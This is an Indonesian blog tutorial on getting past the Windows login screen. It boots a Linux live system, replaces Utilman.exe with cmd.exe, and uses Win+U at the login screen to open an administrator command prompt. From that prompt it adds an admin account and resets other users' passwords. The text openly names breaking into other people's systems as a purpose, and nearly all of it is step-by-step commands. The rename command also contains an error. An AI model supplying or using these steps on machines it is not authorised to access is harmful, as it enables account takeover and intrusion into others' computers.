Pada tutorial kali ini kita dihadapkan dengan permasalahan lupa password Windows atau iseng² berhadiah, ingin menjebol sistem orang lain. Yang perlu disiapkan adalah Linux Backtrack (atau yang lain, yang pasti sudah bisa read/write partisi Windows). Disini kita memanfaatkan fitur Windows yang ada pada halaman login, yaitu Utilman (Utility Manager), yang dapat anda akses dengan cara menekan tombol Win+U. Maka akan muncul Utilman. Fitur inilah yang nantinya akan kita exploit/ganti menjadi command prompt. beginilah ceritanya (kayak dongeng aja.. Kekekeke…).
- Boot Komputer target menggunakan Backtrack, masuk ke mode GUI (dapat juga dengan mode text, yang penting anda tahu letak partisi Windows target)
- Masuk ke direktori C:\Windows\System32\ (pada komputer saya terdapat di/mnt/hda1/WINDOWS/System32) dengan mengetik :
cd /mnt/hda/WINDOWS/System32 # Masuk ke direktori System Windows
mv Utilman.exe mv Utilman_old.exe # Rename Utility Manager
cp cmd.exe Utilman.exe # Copy file Command Prompt menjadi Utility Manager
- Setelah selesai, booting komputer ke Windows.
- Setelah masuk Windows (halaman login), Pencet tombol Win+U, maka akan muncul halaman Command Prompt.
- Perhatikan, Command Prompt yang anda dapatkan adalah sebagai administrator. Dari sinilah anda dapat melakukan segalanya.
- Untuk menambahkan user dengan hak akses setara admin lakukan langkah berikut :
C:\>net user nama_user password /add
- Contoh : saya akan menambahkan user f1dz dengan password majezty :
C:\>net user f1dz majezty /add
- Untuk mengubah menjadi group administrator, ketik :
C:\>net localgroup administrators f1dz /add
- Sekarang kita sudah mempunyai account dengan hak akses setara admin, silahkan login menggunakan user tersebut.
- Jika untuk me-reset password administrator, ketik :
C:\>net user administrator *
- Cara tersebut juga dapat digunakan untuk me-reset password user lain, ganti “administrator” dengan user yang akan diganti passwordnya.
Semoga bermanfaat..
Terima kasih kepada offensive-security team atas inspirasinya.
Like this:
Like Loading...